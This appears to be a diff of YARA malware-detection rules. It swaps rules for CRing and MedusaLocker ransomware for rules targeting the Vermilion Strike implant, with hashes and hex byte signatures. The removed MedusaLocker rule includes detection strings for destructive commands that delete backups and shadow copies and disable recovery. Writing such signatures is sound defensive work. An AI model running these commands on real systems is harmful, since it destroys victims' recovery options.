+		hash1 = "c49631db0b2e41125ccade68a0fe7fb70939315f1c580510e40e5b30ead868f5"
+		hash2 = "07b815cee2b85a41820cd8157a68f35aa1ed0aa5f4093b8cb79a1d645a16273f"
+		hash3 = "7129434afc1fec276525acfeee5bb08923ccd9b32269638a54c7b452f5493492"
+		tlp = "White"
+		adversary = "Vermilion Strike"
 
 	strings:
-		$s1 = { 48 8b c4 55 41 56 41 57 48 8d a8 38 fa ff ff 48 81 ec b0 06 00 00 48 c7 85 a0 02 00 00 fe ff ff ff 48 89 58 08 48 89 70 10 48 89 78 18 4c 89 60 20 48 8b 05 68 bf 0b 00 48 33 c4 48 89 85 a0 05 00 00 45 33 e4 4c 89 65 08 4c 89 65 10 44 89 64 24 20 48 8d 54 24 20 48 8d 4d 08 e8 30 96 01 00 90 48 c7 85 f8 00 00 00 07 00 00 00 4c 89 a5 f0 00 00 00 66 44 89 a5 e0 00 00 00 45 8d 44 24 04 48 8d 15 79 d8 08 00 48 8d 8d e0 00 00 00 e8 dd b0 00 00 90 48 8d 8d e0 00 00 00 e8 50 30 ff ff 90 48 83 bd f8 00 00 00 08 72 0d 48 8b 8d e0 00 00 00 ff 15 b0 32 06 00 48 c7 85 b8 01 00 00 07 00 00 00 4c 89 a5 b0 01 00 00 66 44 89 a5 a0 01 00 00 41 b8 10 00 00 00 48 8d 15 61 d6 08 00 48 8d 8d a0 01 00 00 e8 85 b0 00 00 90 48 8d 95 a0 01 00 00 48 8d 8d 80 05 00 00 e8 41 96 01 00 90 48 83 bd b8 01 00 00 08 72 0d 48 8b 8d a0 01 00 00 ff 15 51 32 06 00 48 c7 85 68 04 00 00 07 00 00 00 4c 89 a5 60 04 00 00 66 44 89 a5 50 04 00 00 48 c7 85 78 01 00 00 07 00 00 00 4c 89 a5 70 01 00 00 66 44 89 a5 60 01 00 00 49 83 ce ff 4d 8b ce 45 33 c0 48 8d 95 80 05 00 00 48 8d 8d 60 01 00 00 e8 c8 ae 00 00 90 48 8d 95 60 01 00 00 48 8d 8d e0 01 00 00 e8 e4 5b ff ff 90 48 8d 8d 50 04 00 00 48 3b c8 74 15 4d 8b ce 45 33 c0 48 8b d0 48 8d 8d 50 04 00 00 e8 92 ae 00 00 48 8d 8d 50 04 00 00 e8 b6 11 ff ff 90 48 83 bd f8 01 00 00 08 72 0d 48 8b 8d e0 01 00 00 ff 15 a6 31 06 00 48 c7 85 f8 01 00 00 07 00 00 00 4c 89 a5 f0 01 00 00 66 44 89 a5 e0 01 00 00 48 83 bd 78 01 00 00 08 72 0d 48 8b 8d 60 01 00 00 ff 15 75 31 06 00 33 d2 48 8d 8d 50 04 00 00 e8 5f 2b 04 00 48 c7 85 58 01 00 00 07 00 00 00 4c 89 a5 50 01 00 00 66 44 89 a5 40 01 00 00 41 b8 0d 00 00 00 48 8d 15 b8 e2 08 00 48 8d 8d 40 01 00 00 e8 3c af 00 00 90 e8 96 2d ff ff 48 8d 48 30 48 8d 95 40 01 00 00 e8 b6 77 00 00 48 8b c8 e8 fe dc 02 00 48 8b c8 e8 16 d5 ff ff 90 48 83 bd 58 01 00 00 08 72 0d 48 8b 8d 40 01 00 00 ff 15 f6 30 06 00 48 c7 85 18 01 00 00 07 00 00 00 4c 89 a5 10 01 00 00 66 44 89 a5 00 01 00 00 41 b8 24 00 00 00 48 8d 15 d7 e3 08 00 48 8d 8d 00 01 00 00 e8 cb ae 00 00 90 48 8d 8d 00 01 00 00 e8 ce 6b 00 00 84 c0 0f 94 c3 48 83 bd 18 01 00 00 08 72 0d 48 8b 8d 00 01 00 00 ff 15 9a 30 06 00 84 db 0f 84 36 08 00 00 4c 89 a5 88 04 00 00 4c 89 a5 90 04 00 00 e8 f7 3b 01 00 48 89 85 88 04 00 00 48 c7 45 50 07 00 00 00 4c 89 65 48 66 44 89 65 38 41 b8 0b 00 00 00 48 8d 15 2a d6 08 00 48 8d 4d 38 e8 59 ae 00 00 90 e8 b3 2c ff ff 48 8d 48 30 48 8d 55 38 e8 96 75 00 00 48 c7 85 b0 04 00 00 07 00 00 00 4c 89 a5 a8 04 00 00 66 44 89 a5 98 04 00 00 4d 8b ce 45 33 c0 48 8b d0 48 8d 8d 98 04 00 00 e8 d7 ac 00 00 90 48 83 7d 50 08 72 0a 48 8b 4d 38 ff 15 fd 2f 06 00 48 c7 45 50 07 00 00 00 4c 89 65 48 66 44 89 65 38 4c 89 a5 b8 04 00 00 4c 89 a5 c0 04 00 00 4c 89 a5 c8 04 00 00 48 c7 45 00 07 00 00 00 4c 89 65 f8 66 44 89 65 e8 41 b8 01 00 00 00 48 8d 15 0d e3 08 00 48 8d 4d e8 e8 b8 ad 00 00 90 48 c7 45 c0 07 00 00 00 4c 89 65 b8 66 44 89 65 a8 41 b8 0d 00 00 00 48 8d 15 e9 e2 08 00 48 8d 4d a8 e8 90 ad 00 00 90 e8 ea 2b ff ff 48 8d 48 30 48 8d 55 a8 e8 cd 74 00 00 48 8b d0 4c 8d 45 e8 48 8d 8d b8 04 00 00 e8 1a 55 01 00 90 48 83 7d c0 08 72 0a 48 8b 4d a8 ff 15 50 2f 06 00 48 c7 45 c0 07 00 00 00 4c 89 65 b8 66 44 89 65 a8 48 83 7d 00 08 72 0a 48 8b 4d e8 ff 15 2e 2f 06 00 48 c7 45 00 07 00 00 00 4c 89 65 f8 66 44 89 65 e8 48 8d 85 98 04 00 00 48 89 85 c0 00 00 00 48 8d 85 88 04 00 00 48 89 85 c8 00 00 00 48 8b 9d b8 04 00 00 48 8b bd c0 04 00 00 48 3b df 0f 84 8b 02 00 00 66 90 4c 89 a5 48 05 00 00 4c 89 a5 50 05 00 00 48 c7 45 30 07 00 00 00 4c 89 65 28 66 44 89 65 18 4c 8d 85 50 04 00 00 48 83 bd 68 04 00 00 08 4c 0f 43 85 50 04 00 00 48 8d 95 50 04 00 00 48 0f 43 95 50 04 00 00 48 8b 85 60 04 00 00 4d 8d 04 40 48 8d 4d 18 e8 37 b4 01 00 90 48 8d 55 18 48 8d 8d 48 05 00 00 e8 36 9a 00 00 90 48 83 7d 30 }
-		$s2 = { 48 c7 85 b0 04 00 00 07 00 00 00 4c 89 a5 a8 04 00 00 66 44 89 a5 98 04 00 00 4c 8b 85 88 04 00 00 4d 8b c8 4d 8b 00 48 8d 95 28 02 00 00 48 8d 8d 88 04 00 00 e8 d1 fe 00 00 48 8b 8d 88 04 00 00 ff 15 5c 28 06 00 48 c7 45 e0 0f 00 00 00 4c 89 65 d8 c6 45 c8 00 41 b8 0e 00 00 00 48 8d 15 b7 db 08 00 48 8d 4d c8 e8 ee d0 00 00 90 48 8d 4d c8 e8 54 8c 01 00 48 8b d8 48 83 7d e0 10 72 0a 48 8b 4d c8 ff 15 18 28 06 00 48 c7 45 e0 0f 00 00 00 4c 89 65 d8 c6 45 c8 00 48 }
-		$s3 = { 48 8d 8d a8 02 00 00 e8 88 64 01 00 90 48 8b 08 48 89 4c 24 38 48 8b 48 08 48 89 4c 24 40 4c 89 20 4c 89 60 08 48 8d 54 24 38 48 8d 4c 24 48 e8 a0 8e 01 00 90 48 c7 45 a0 07 00 00 00 4c 89 65 98 66 44 89 65 88 41 b8 0b 00 00 00 48 8d 15 d9 d3 08 00 48 8d 4d 88 e8 a8 a5 00 00 90 48 8d 54 24 48 48 8d 4d 88 e8 d9 60 00 00 90 48 83 7d a0 08 72 0a 48 8b 4d 88 ff 15 7f 27 06 00 48 c7 45 a0 07 00 00 00 4c 89 65 98 66 44 89 65 88 48 8b 4c 24 48 48 85 c9 74 0b 48 8b 01 ba 01 00 00 00 ff 10 90 48 8b 4c 24 40 }
-		$s4 = { 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 85 df 06 00 49 8b ce e8 05 dd ff ff e8 e0 db ff ff 48 8d 78 30 e8 27 fc ff ff 33 f6 84 c0 0f 85 ae 01 00 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 44 8d 46 07 48 8d 15 cf 84 09 00 48 8d 4c 24 20 e8 45 5d 01 00 90 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 44 8d 46 07 48 8d 15 a6 84 09 00 48 8d 4c 24 40 e8 1c 5d 01 00 90 48 8d 54 24 20 48 8b cf e8 5e 24 01 00 48 8b d8 48 8d 54 24 40 48 8d 4d 18 e8 4d 24 01 00 48 8b c8 48 8b d3 e8 72 c1 ff ff 85 c0 0f 9e c3 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 d2 de 06 00 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 48 83 7c 24 38 08 72 0b 48 8b 4c 24 20 ff 15 ac de 06 00 84 db 0f 84 ed 00 00 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 20 00 00 00 48 8d 15 ec 84 09 00 48 8d 4c 24 20 e8 82 5c 01 00 90 48 8d 05 3a aa 09 00 48 89 44 24 40 48 c7 44 24 60 07 00 00 00 48 89 74 24 58 66 89 74 24 48 49 83 c9 ff 45 33 c0 48 8d 54 24 20 48 8d 4c 24 48 e8 0c 5b 01 00 90 48 8d 05 e4 a8 09 00 48 89 45 80 48 8d 4d 88 ff 15 76 de 06 00 48 8d 05 ff e7 06 00 48 89 45 a0 48 89 75 a8 48 89 75 b0 48 89 75 b8 c7 45 c0 ff ff ff ff 48 8b 45 80 48 63 48 04 48 8d 05 71 9a 09 00 48 89 44 0d 80 48 8b 45 80 48 63 48 08 48 8d 05 bd ac 09 00 48 89 44 0d 80 48 8d 54 24 40 48 8d 4d 80 e8 a2 e0 02 00 48 8b d0 41 b8 01 00 00 00 48 8d 4d d0 e8 e0 05 00 00 48 8d 15 81 f8 0b 00 48 8d 4d d0 e8 a2 46 06 00 90 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 0b 00 00 00 48 8d 15 67 83 09 00 48 8d 4c 24 20 e8 95 5b 01 00 90 48 8d 54 24 20 49 8b cd e8 d7 22 01 00 49 3b c4 74 13 49 83 c9 ff 45 33 c0 49 8b d4 48 8b c8 e8 30 5a 01 00 90 48 83 7c 24 38 08 72 0b 48 8b 4c 24 20 ff 15 54 dd 06 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 07 00 00 00 48 8d 15 bc 82 09 00 48 8d 4c 24 20 e8 32 5b 01 00 90 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 41 b8 07 00 00 00 48 8d 15 91 82 09 00 48 8d 4c 24 40 e8 07 5b 01 00 90 48 8d 54 24 20 48 8d 4d 18 e8 48 22 01 00 48 8b d8 48 8d 54 24 40 48 8b cf e8 38 22 01 00 48 3b c3 74 13 49 83 c9 ff 45 33 c0 48 8b d3 48 8b c8 e8 91 59 01 00 90 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 b5 dc 06 00 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 }
+		$s1 = { 50 c7 03 01 00 00 00 e8 cc ?? 00 00 89 43 04 83 f8 ff 74 2c 8b 4d 08 6a 00 8d 44 24 0c 50 53 6a 08 6a 01 51 e8 91 ?? 00 00 85 c0 75 13 8b 44 24 08 66 83 78 08 01 6a 01 50 74 38 e8 80 ?? 00 00 8b 4e 10 2b 4e 0c b8 93 24 49 92 f7 e9 03 d1 c1 fa 04 8b c2 c1 e8 1f 47 03 c2 3b f8 0f 8c 30 ff ff ff 53 ff 15 }
+		$s2 = { 8b 4c 24 1c 6a 00 6a 00 6a 00 6a 01 51 ff 15 5c a2 02 10 8b 55 0c 8b f0 56 6a 02 53 52 8b cf 89 74 24 34 e8 f0 fb ff ff 8b 45 0c 83 c4 10 6a 00 6a 00 6a 03 6a 00 6a 00 50 57 56 ff 15 50 a2 02 10 8b 4c 24 30 6a 00 68 00 82 80 80 6a 00 6a 00 6a 00 53 51 50 89 44 24 3c ff 15 64 a2 02 10 8b f8 89 7c 24 14 8d 49 00 8b b4 24 90 00 00 00 8b 5c 24 7c 8b c3 83 fe 10 73 04 8d 44 24 7c 8d 50 01 8d a4 24 00 00 00 00 8a 08 40 84 c9 75 f9 2b c2 8b cb 83 fe 10 73 04 8d 4c 24 7c 8b 55 20 52 8b 54 24 2c 52 50 51 57 ff 15 4c a2 02 10 85 }
+		$s3 = { 68 00 00 00 10 6a 00 6a 00 6a 00 6a 00 c7 44 24 60 01 00 00 00 ff 15 40 a2 02 10 8b d8 8d 54 24 2c 52 8d 44 24 3c 50 55 53 ff 15 38 a2 02 10 8b e8 85 db 74 07 53 ff 15 44 a2 02 10 85 ed 74 2f 8b }
+		$s4 = { 6a ff 68 [2] 02 10 64 a1 00 00 00 00 50 81 ec 14 01 00 00 a1 c0 72 03 10 33 c4 89 84 24 10 01 00 00 53 a1 c0 72 03 10 33 c4 50 8d 84 24 1c 01 00 00 64 a3 00 00 00 00 33 db 8d 44 24 0c 89 9c 24 24 01 00 00 50 8d 4c 24 18 89 5c 24 0c 51 89 74 24 18 c7 44 24 14 04 01 00 00 ff 15 04 a0 02 10 8d 44 24 14 c7 46 18 0f 00 00 00 89 5e 14 88 5e 04 8d 50 01 8a 08 40 3a cb 75 f9 2b c2 50 8d 54 24 18 52 8b ce e8 [2] ff ff 89 9c 24 24 01 00 00 c7 44 24 08 01 00 00 00 e8 d1 fe ff ff 85 c0 8b c6 74 0e 6a 02 68 ?? c6 02 10 e8 [2] ff ff 8b c6 8b 8c 24 1c 01 00 00 64 89 0d 00 00 00 00 59 5b 8b 8c 24 }
+		$s5 = { a1 c0 72 03 10 33 c4 89 44 24 2c 68 00 00 00 f0 6a 18 6a 00 6a 00 68 4c 97 03 10 ff 15 30 a0 02 10 85 c0 75 11 33 c0 8b 4c 24 2c 33 cc e8 [2] 00 00 83 c4 30 c3 8b 15 58 97 03 10 8b 0d 54 97 03 10 68 50 97 03 10 6a 00 33 c0 6a 00 66 89 44 24 1e a1 5c 97 03 10 89 54 24 2c 6a 1c 8d 54 24 20 89 44 24 34 a1 4c 97 03 10 89 4c 24 2c 8b 0d 60 97 03 10 52 50 c6 44 24 28 08 c6 44 24 29 02 c7 44 24 2c 0e 66 00 00 c7 44 24 30 10 00 00 00 89 4c 24 40 ff 15 2c a0 02 10 85 c0 74 87 8b 0d 50 97 03 10 56 8b 35 38 a0 02 10 6a 00 68 ?? 82 03 10 6a 01 51 c7 44 24 18 01 00 00 00 c7 44 24 20 01 00 00 00 ff d6 85 c0 74 2b a1 50 97 03 10 6a 00 8d 54 24 0c 52 6a 03 50 ff d6 85 c0 74 16 8b 15 50 97 03 10 6a 00 8d 4c 24 14 51 6a 04 52 ff d6 85 c0 75 12 33 c0 5e 8b 4c 24 2c 33 cc e8 [2] 00 00 83 c4 30 c3 8b 15 50 97 03 10 6a }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 300KB and 3 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 30KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Cring_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_ELF_Vermilion_Strike_Sep_2021_1 : FILE
 {
 	meta:
-		description = "Detect CRing ransomware"
+		description = "Detect the ELF version of Vermilion Strike implant"
 		author = "Arkbird_SOLG"
-		id = "3648494d-8c27-5767-90e8-45e294aac382"
-		date = "2021-04-08"
-		modified = "2021-04-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-08/CRing/RAN_CRing_Apr_2021_1.yara#L1-L19"
+		id = "bfc498b6-4d3d-5ae9-a360-d31f8cf6c5fc"
+		date = "2021-09-14"
+		modified = "2021-09-16"
+		reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_ELF_Vermilion_Strike_Sep_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "d82db146c9048391d79bda6cc5913363fc3cfc1a7cca26b23b362b7f3563ef3c"
+		logic_hash = "fe4bb6da7b29f1ae7c25a657d27f5e60ffa0e7d9f1f09a5a2331e4a80eb79481"
 		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "274ef2fba8ba46187f9cf462a02de286ea23ec75d163af01088f6856944817eb"
-		hash2 = "f7d270ca0f2b4d21830787431f881cd004b2eb102cc3048c6b4d69cb775511c8"
-		hash3 = "ebb528207b2fc06a6bc89e9d430bcdfe254f0838b0f4660f67cc6bd1ebc193be"
-		level = "Experimental"
+		hash1 = "294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc"
+		level = "experimental"
+		tlp = "White"
+		adversary = "Vermilion Strike"
 
 	strings:
-		$str1 = { 1b 30 03 00 4a 00 00 00 03 00 00 11 02 73 23 00 00 0a 0a 06 6f 24 00 00 0a 2d 3a 02 72 [1-4] 00 00 70 28 25 00 00 0a 0b 72 [1-4] 00 00 70 02 28 25 00 00 0a 28 1a 00 00 0a 06 6f 26 00 00 0a 07 7e 01 00 00 04 28 05 00 00 06 2c 06 06 6f 27 00 00 0a de 03 26 de 00 2a 00 00 01 10 00 00 00 00 1b 00 2b 46 00 03 13 00 00 01 }
-		$str2 = { 1b 30 05 00 1a 01 00 00 04 00 00 11 16 0a 73 28 00 00 0a 0b 07 6f 29 00 00 0a 1e 5b 8d 2c 00 00 01 0c 07 6f 2a 00 00 0a 1e 5b 8d 2c 00 00 01 0d 73 2b 00 00 0a 13 06 11 06 08 6f 2c 00 00 0a 11 06 09 6f 2c 00 00 0a de 0c 11 06 2c 07 11 06 6f 12 00 00 0a dc 08 8e 69 09 8e 69 58 8d 2c 00 00 01 13 04 08 11 04 08 8e 69 28 2d 00 00 0a 09 16 11 04 08 8e 69 09 8e 69 28 2e 00 00 0a 11 04 04 28 06 00 00 06 13 04 11 04 8e 69 28 2f 00 00 0a 13 05 07 08 09 6f 30 00 00 0a 13 07 02 19 73 31 00 00 0a 13 08 03 18 73 31 00 00 0a 13 09 11 09 11 07 17 73 32 00 00 0a 13 0a 11 09 11 05 16 11 05 8e 69 6f 33 00 00 0a 11 09 11 04 16 11 04 8e 69 6f 33 00 00 0a 11 08 11 0a 20 [4] 6f 34 00 00 0a de 30 11 0a 2c 07 11 0a 6f 12 00 00 0a dc 11 09 2c 07 11 09 6f 12 00 00 0a dc 11 08 2c 07 11 08 6f 12 00 00 0a dc 11 07 2c 07 11 07 6f 12 00 00 0a dc 17 0a de 0a 07 2c 06 07 6f 12 00 00 0a dc 06 2a 00 00 41 94 00 00 02 00 00 00 2b 00 00 00 12 00 00 00 3d 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 ae 00 00 00 2c 00 00 00 da 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 a2 00 00 00 44 00 00 00 e6 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 99 00 00 00 59 00 00 00 f2 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 90 00 00 00 6e 00 00 00 fe 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 08 00 00 00 06 01 00 00 0e 01 00 00 0a 00 00 00 00 00 00 00 }
-		$str3 = { 1b 30 03 00 24 00 00 00 05 00 00 11 73 35 00 00 0a 0a 06 03 6f 36 00 00 0a 06 02 17 6f 37 00 00 0a 0b de 0a 06 2c 06 06 6f 12 00 00 0a dc 07 2a 01 10 00 00 02 00 06 00 12 18 00 0a 00 00 00 00 }
+		$s1 = { be bd f8 40 00 41 55 49 89 fd bf a3 f8 40 00 41 54 55 53 48 81 ec 20 04 00 00 e8 4f cb ff ff 48 85 c0 48 89 c5 0f 84 af 01 00 00 48 8d 5c 24 20 41 bc 0a 00 00 00 41 be b0 32 40 00 66 90 48 89 ea be c8 00 00 00 48 89 df e8 30 cd ff ff 48 85 c0 0f 84 4f 01 00 00 80 7c 24 20 23 74 e0 bf b4 f8 40 00 48 89 de 4c 89 e1 f3 a6 75 d1 be d4 1d 41 }
+		$s2 = { 8b 43 14 8b 73 10 8b 4b 0c 8d 56 01 44 8d 80 6c 07 00 00 be 70 21 41 00 31 c0 e8 ed 34 ff ff 48 85 ed 74 28 8b 4b 04 8b 53 08 48 89 ef 44 8b 03 48 83 c4 08 be 79 21 41 00 5b 5d }
+		$s3 = { 55 53 48 83 ec 70 48 8d 44 24 30 48 89 44 24 10 48 8d 44 24 40 48 89 44 24 08 8b 84 24 90 00 00 00 89 04 24 e8 22 fb ff ff e8 fd 58 ff ff e8 38 5a ff ff e8 f3 59 ff ff 0f 1f 00 e8 5b 5e ff ff 48 89 c7 e8 23 5b ff ff 48 89 c7 48 89 c5 e8 18 5f ff ff 48 8d 4c 24 50 31 d2 be 6e 00 00 00 48 89 c7 48 89 c3 e8 41 59 ff ff 48 8b 7c 24 50 31 c9 ba 04 00 00 00 be 21 00 00 00 e8 1b 60 ff ff 48 8d 54 24 2f 48 8d 7c 24 60 4c 89 e6 e8 d9 5c ff ff 48 8d 7c 24 60 ba 88 f8 40 00 be a7 20 41 00 e8 a5 1f 00 00 48 8b 4c 24 60 31 d2 be 64 00 00 00 48 89 df e8 f1 58 ff ff 31 c9 31 d2 be 65 00 00 00 48 89 df e8 e0 58 ff ff 48 85 c0 7e 73 48 8b 7c 24 50 e8 41 58 ff ff 8b 54 24 30 48 8b 74 24 40 48 89 df e8 50 59 ff ff 48 8b 7c 24 40 e8 66 12 00 00 48 8b 94 24 a0 00 00 00 48 8b b4 24 98 00 00 00 48 89 df e8 0e fd ff ff 48 89 df e8 b6 5f ff ff 48 89 ef e8 ce 58 ff ff b8 01 00 00 00 48 8b 54 24 60 48 8d 7a e8 48 81 ff c0 54 61 00 75 23 48 83 c4 70 5b 5d 41 5c c3 66 0f 1f 44 00 00 48 89 df e8 80 5f ff ff 48 89 ef e8 98 58 ff ff 31 c0 eb cb be b0 32 40 00 48 8d 4f 10 48 85 f6 74 3d 83 ca ff }
+		$s4 = { 8b 15 6e e4 20 00 31 ff be e0 57 61 00 e8 0a b8 ff ff 48 89 c7 31 c0 48 85 ff 74 17 48 89 3d e9 e4 20 00 e8 a4 bf ff ff 89 05 e6 e4 20 00 b8 01 00 }
+		$s5 = { b8 02 00 00 00 48 89 fb 48 83 ec 10 66 89 04 25 00 00 00 00 e8 a6 4e ff ff 83 f8 ff 89 04 24 74 16 89 04 25 04 00 00 00 b8 01 00 00 00 48 83 c4 10 5b c3 0f 1f 40 00 48 89 df e8 f0 4e ff ff 48 89 c1 31 c0 48 85 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 5KB and 2 of them
+		uint32( 0 ) == 0x464c457f and filesize > 30KB and 4 of them
 }
-rule ARKBIRD_SOLG_RAN_Medusalocker_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Stager_Vermilion_Strike_Sep_2021_1 : FILE
 {
 	meta:
-		description = "Detect MedusaLocker ransomware"
+		description = "Detect the windows version of the stager of Vermilion Strike implant"
 		author = "Arkbird_SOLG"
-		id = "9e647371-b37a-53af-bfb6-cde72855b564"
-		date = "2021-08-08"
-		modified = "2021-08-08"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-08/medusalocker/RAN_MedusaLocker_Aug_2021_1.yara#L1-L29"
+		id = "7a8ae258-1fb4-5a24-b69e-3a632e00bfae"
+		date = "2021-09-14"
+		modified = "2021-09-16"
+		reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_Stager_Vermilion_Strike_Sep_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "40dd3ec16eefc59cb25c8855fb62cda1d642ec711226c1c964fd26384be7ef15"
-		score = 75
-		quality = 73
+		logic_hash = "cc4d59c92faba1f3435c8454071a1e1c60b6339393796c76e64b890bb85d13cc"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "4f9a833e79092006c06203a66b41fc9250bcebcee148fea404db75d52035131c"
-		hash2 = "212e7f5ed4a581b4d778dfef226738c6db56b4b4006526259392d03062587887"
-		hash3 = "a25c0227728878c386ab6dba139976cb10e853dd3cd1eb3623f236ee8e1df212"
-		hash4 = "c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc"
-		hash5 = "0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad"
-		hash6 = "f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31"
-		tlp = "white"
-		adversary = "RaaS"
+		hash1 = "3ad119d4f2f1d8ce3851181120a292f41189e4417ad20a6c86b6f45f6a9fbcfc"
+		level = "experimental"
+		tlp = "White"
+		adversary = "Vermilion Strike"
 
 	strings:
-		$s1 = "{8761ABBD-7F85-42EE-B272-A76179687C63}" fullword wide
-		$s2 = { 83 c4 08 8d 8d ?? fe ff ff e8 [2] ff ff 8d 8d ?? fe ff ff e8 [2] ff ff 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 68 [2] 48 00 8d 8d [2] ff ff e8 [2] 00 00 8d 8d [2] ff ff 51 e8 ?? f9 ff ff 83 c4 04 88 85 2b ff ff ff 8d 8d [2] ff ff e8 [2] 00 00 0f b6 95 2b ff ff ff 85 d2 74 1e 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 33 c0 e9 [2] 00 00 8d 4d fa e8 [2] ff ff 8d 4d fa e8 [2] 01 00 8d 4d fa e8 [2] 01 00 8d 4d fa e8 [2] 01 00 0f b6 c0 85 c0 74 0c c7 85 ?? fe ff ff [2] 48 00 eb 0a c7 85 ?? fe ff ff [2] 48 00 8b 8d ?? fe ff ff 89 8d ?? fe ff ff 8d 95 ?? fe ff ff 52 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff e8 ?? f8 ff ff 8d 4d 8c e8 [2] 00 00 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff b9 [2] 4a 00 e8 [2] ff ff 50 e8 [2] ff ff 83 c4 04 50 8d 4d 8c e8 [2] 00 00 0f b6 c0 85 c0 75 41 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff e8 ?? c6 ff ff c7 85 ?? fe ff ff 00 00 00 00 8d 4d 8c e8 [2] 00 00 8d 4d fa e8 [2] ff ff 8b 85 ?? fe ff ff e9 [2] 00 00 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 68 [2] 48 00 8d 8d ?? fe ff ff e8 [2] 00 00 8d 8d ?? fd ff ff 51 8d 4d 8c e8 [2] 00 00 50 e8 [2] ff ff 83 c4 04 50 8d 95 ?? fe ff ff 52 b9 [2] 4a 00 e8 [2] 00 00 0f b6 c0 85 c0 75 0c c7 85 ?? fe ff ff 01 00 00 00 eb 0a c7 85 ?? fe ff ff 00 00 00 00 8a 8d ?? fe ff ff 88 8d 2a ff ff ff 8d 8d ?? fd ff ff e8 [2] 00 00 8d 8d ?? fe ff ff }
-		$s3 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 62 00 6f 00 6f 00 74 00 73 00 74 00 61 00 74 00 75 00 73 00 70 00 6f 00 6c 00 69 00 63 00 79 00 20 00 69 00 67 00 6e 00 6f 00 72 00 65 00 61 00 6c 00 6c 00 66 00 61 00 69 00 6c 00 75 00 72 00 65 00 73 }
-		$s4 = { 42 67 49 41 41 41 43 6b 41 41 42 53 55 30 45 78 }
-		$s5 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" fullword wide
-		$s6 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 72 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 20 00 4e 00 6f }
-		$s7 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00 6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 }
-		$s8 = { 77 00 6d 00 69 00 63 00 2e 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4f 00 57 00 43 00 4f 00 50 00 59 00 20 00 2f 00 6e 00 6f 00 69 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 }
-		$s9 = { 77 00 62 00 61 00 64 00 6d 00 69 00 6e 00 20 00 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4b 00 55 00 50 }
